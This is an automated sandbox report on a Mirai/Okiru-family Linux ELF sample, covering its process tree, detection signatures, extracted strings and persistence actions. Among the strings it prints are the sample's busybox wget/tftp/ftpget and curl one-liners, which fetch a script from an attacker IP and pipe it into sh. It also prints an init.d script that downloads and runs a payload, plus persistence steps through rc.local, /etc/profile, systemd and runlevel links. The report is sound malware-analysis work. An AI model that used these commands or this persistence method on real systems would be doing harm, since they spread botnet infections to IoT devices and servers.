Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm.nn.elf

Overview

General Information

Sample name:arm.nn.elf
Analysis ID:1526568
MD5:fa572b646bbb73d97a1bb5e4ac38883f
SHA1:ed43abbd7a464ffedfe22099c2c33af3cbcbd70d
SHA256:f52cf4400acc178aa397fee66c52ac0bc61b1435968c2b76bd79229bac28409d
Tags:user-elfdigest
Infos:

Detection

Mirai, Okiru
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1526568
Start date and time:2024-10-06 11:43:08 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 4s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm.nn.elf
Detection:MAL
Classification:mal80.spre.troj.evad.linELF@0/10@0/0
  • Skipping network analysis since amount of network traffic is too extensive
Command:/tmp/arm.nn.elf
PID:5427
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • arm.nn.elf (PID: 5427, Parent: 5352, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm.nn.elf
    • sh (PID: 5461, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 5473, Parent: 5461)
      • systemctl (PID: 5473, Parent: 5461, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 5495, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
      • sh New Fork (PID: 5501, Parent: 5495)
      • chmod (PID: 5501, Parent: 5495, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mybinary
    • sh (PID: 5502, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
      • sh New Fork (PID: 5504, Parent: 5502)
      • ln (PID: 5504, Parent: 5502, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
    • sh (PID: 5505, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
    • sh (PID: 5507, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 5509, Parent: 5507)
      • chmod (PID: 5509, Parent: 5507, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/arm.nn.elf
    • sh (PID: 5510, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 5512, Parent: 5510)
      • mkdir (PID: 5512, Parent: 5510, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 5513, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 5515, Parent: 5513)
      • ln (PID: 5515, Parent: 5513, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
  • udisksd New Fork (PID: 5439, Parent: 802)
  • dumpe2fs (PID: 5439, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • sh (PID: 5474, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 5474, Parent: 1588, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • udisksd New Fork (PID: 5478, Parent: 802)
  • dumpe2fs (PID: 5478, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 5488, Parent: 5487)
  • snapd-env-generator (PID: 5488, Parent: 5487, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 5529, Parent: 802)
  • dumpe2fs (PID: 5529, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5618, Parent: 802)
  • dumpe2fs (PID: 5618, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5619, Parent: 802)
  • dumpe2fs (PID: 5619, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5620, Parent: 802)
  • dumpe2fs (PID: 5620, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5689, Parent: 802)
  • dumpe2fs (PID: 5689, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5723, Parent: 802)
  • dumpe2fs (PID: 5723, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5752, Parent: 802)
  • dumpe2fs (PID: 5752, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5789, Parent: 802)
  • dumpe2fs (PID: 5789, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5818, Parent: 802)
  • dumpe2fs (PID: 5818, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5858, Parent: 802)
  • dumpe2fs (PID: 5858, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5891, Parent: 802)
  • dumpe2fs (PID: 5891, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5937, Parent: 802)
  • dumpe2fs (PID: 5937, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5985, Parent: 802)
  • dumpe2fs (PID: 5985, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6297, Parent: 802)
  • dumpe2fs (PID: 6297, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6342, Parent: 802)
  • dumpe2fs (PID: 6342, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6371, Parent: 802)
  • dumpe2fs (PID: 6371, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6375, Parent: 802)
  • dumpe2fs (PID: 6375, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
arm.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    arm.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      5427.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        5427.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5889.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            5889.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5880.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
                Click to see the 13 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: arm.nn.elfAvira: detected
                Source: arm.nn.elfString: (deleted)/proc/self/exe/proc/%s/exe/proc/opendir/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/./fd/socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/login/proc/self/statusTracerPid/proc/1/cgroupkubepods/proc filesystem not found. Exiting. gorilla botnet didnt like this honeypot..../etc/motdw%s
                Source: arm.nn.elfString: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://154.216.19.140/lol.sh -O- | sh;/bin/busybox tftp -g http://154.216.19.140/ -r lol.sh -l- | sh;/bin/busybox ftpget http://154.216.19.140/ lol.sh lol.sh && sh lol.sh;curl http://154.216.19.140/curl.sh -o- | sh154.216.19.140GET /dlr. HTTP/1.0
                Source: /tmp/arm.nn.elf (PID: 5427)Socket: 0.0.0.0:38242Jump to behavior
                Source: arm.nn.elf, profile.12.dr, inittab.12.dr, arm.nn.elf.36.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.drString found in binary or memory: http://154.216.19.140/
                Source: arm.nn.elfString found in binary or memory: http://154.216.19.140/curl.sh
                Source: arm.nn.elfString found in binary or memory: http://154.216.19.140/lol.sh
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: (deleted)/proc/self/exe/proc/%s/exe/proc/opendir/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/./fd/socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresha
                Source: Initial sampleString containing 'busybox' found: usage: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://154.216.19.140/lol.sh -O- | sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://154.216.19.140/ -r lol.sh -l- | sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://154.216.19.140/ lol.sh lol.sh && sh lol.sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
                Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://154.216.19.140/lol.sh -O- | sh;/bin/busybox tftp -g http://154.216.19.140/ -r lol.sh -l- | sh;/bin/busybox ftpget http://154.216.19.140/ lol.sh lol.sh && sh lol.sh;curl http://154.216.19.140/curl.sh -o- | sh154.216.19.140GET /dlr. HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/arm.nn.elf (PID: 5445)SIGKILL sent: pid: 792, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5445)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5445)SIGKILL sent: pid: 1944, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5445)SIGKILL sent: pid: 3181, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5445)SIGKILL sent: pid: 3185, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5445)SIGKILL sent: pid: 5474, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5889)SIGKILL sent: pid: 5880, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6045)SIGKILL sent: pid: 6018, result: successfulJump to behavior
                Source: classification engineClassification label: mal80.spre.troj.evad.linELF@0/10@0/0

                Persistence and Installation Behavior

                barindex
                Source: /tmp/arm.nn.elf (PID: 5427)File: /etc/profileJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5427)File: /etc/rc.localJump to behavior
                Source: /usr/bin/ln (PID: 5504)File: /etc/rcS.d/S99mybinary -> /etc/init.d/mybinaryJump to behavior
                Source: /usr/bin/ln (PID: 5515)File: /etc/rc.d/S99arm.nn.elf -> /etc/init.d/arm.nn.elfJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5427)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 5501)File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 5509)File: /etc/init.d/arm.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6232/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5660/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6154/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5661/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5782/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5662/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5981/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5663/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5861/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5620/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6192/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5618/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5816/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5937/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5619/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5818/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5655/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5656/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5733/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5657/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5658/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5659/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5736/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5858/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6045/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6243/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5352/cmdlineJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5870/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6168/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6245/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6244/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5751/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6368/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5752/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6202/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/320/cmdlineJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5269/cmdlineJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5742/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6359/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5985/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/802/cmdlineJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5744/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5745/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5789/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5746/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5944/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5747/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5748/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5749/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6131/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6296/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5681/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6375/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5880/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6297/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5640/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6178/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5641/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5685/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5642/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6371/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5797/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6248/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5679/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5714/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5516/cmdlineJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5837/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5691/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6342/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5891/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6146/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5970/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6346/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6103/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5729/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5807/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5687/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6018/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6139/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5688/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/6336/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5689/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5723/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5889/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5725/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5520)File opened: /proc/5923/statusJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5461)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 5495)Shell command executed: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 5502)Shell command executed: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 5505)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 5507)Shell command executed: sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 5510)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 5513)Shell command executed: sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"Jump to behavior
                Source: /bin/sh (PID: 5501)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mybinaryJump to behavior
                Source: /bin/sh (PID: 5509)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/arm.nn.elfJump to behavior
                Source: /bin/sh (PID: 5512)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
                Source: /bin/sh (PID: 5473)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
                Source: /tmp/arm.nn.elf (PID: 5427)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 5501)File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)Jump to behavior
